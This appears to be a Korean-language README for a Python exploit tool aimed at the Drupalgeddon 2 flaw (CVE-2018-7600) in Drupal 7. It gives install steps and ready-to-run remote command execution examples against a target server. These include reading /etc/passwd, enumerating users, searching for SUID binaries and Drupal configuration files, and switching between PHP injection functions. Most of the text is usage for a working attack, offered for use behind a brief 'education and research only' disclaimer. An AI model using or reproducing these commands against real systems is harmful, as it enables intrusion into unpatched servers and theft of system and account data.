
CVE-2018-7600 (Drupalgeddon 2)용 Python 익스플로잇으로, Drupal 7에서 원격 코드 실행을 가능하게 하며 여러 주입 방법과 Linux 및 Windows용 사전 정의된 명령을 제공합니다.
bixi.pybixi.py는 Drupal 7에 영향을 미치는 취약점 CVE‑2018‑7600 (Drupalgeddon 2) 을 위한 익스플로잇입니다.
직관적인 인터페이스와 사전 정의된 명령어를 통해 취약한 Drupal 서버에서 원격 명령 실행(RCE)을 가능하게 합니다.
이 소프트웨어는 교육 목적 및 통제된 환경에서의 연구 목적으로만 사용됩니다.
"큰 힘에는 큰 책임이 따른다"
system, passthru, exec, )shell_execgit clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600
# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests
# 기타 배포판
pip3 install requests
chmod +x bixi.py
python3 bixi.py --help
python3 bixi.py <URL> <COMMAND/KEYWORD> [INJECTION_TYPE]
# 취약점 확인
python3 bixi.py http://10.99.99.6/drupal/ test
# 운영 체제 감지
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows
# 사용자 열거
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user
# 시스템 정보
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig
# 사용자 정의 명령어
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
| 명령어 | 설명 |
|---|---|
| linux | 시스템 정보 |
| users_linux | 사용자 나열 |
| id | 사용자/그룹 정보 |
| ls | 파일 나열 |
| ifconfig | 네트워크 정보 |
| find_flag | 플래그 검색 |
| 명령어 | 설명 |
|---|---|
| windows | 시스템 정보 |
| net_user | 사용자 나열 |
| whoami_win | 상세 정보 |
| ipconfig | 네트워크 |
| netstat_win | 연결 상태 |
| dir | 디렉터리 나열 |
| 명령어 | 설명 |
|---|---|
| sudo | sudo 권한 확인 |
| suid | SUID 바이너리 검색 |
| net_localgroup | 로컬 그룹 |
| drupal_config | 설정 파일 검색 |
| drupal_version | Drupal 버전 확인 |
# system (기본값)
python3 bixi.py http://target/ "whoami" system
# passthru
python3 bixi.py http://target/ "whoami" passthru
# exec
python3 bixi.py http://target/ "whoami" exec
# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec
drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│ ├── linux_commands.txt
│ └── windows_commands.txt
└── screenshots/
├── help_screen.png
└── exploit_success.png
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
기본값(15초) 수정:
timeout=15
get_command_for_keyword() 함수의 commands 딕셔너리 편집
pip3 install requests
# 연결 확인
ping TARGET_IP
# Drupal 경로 확인
curl http://TARGET_IP/drupal/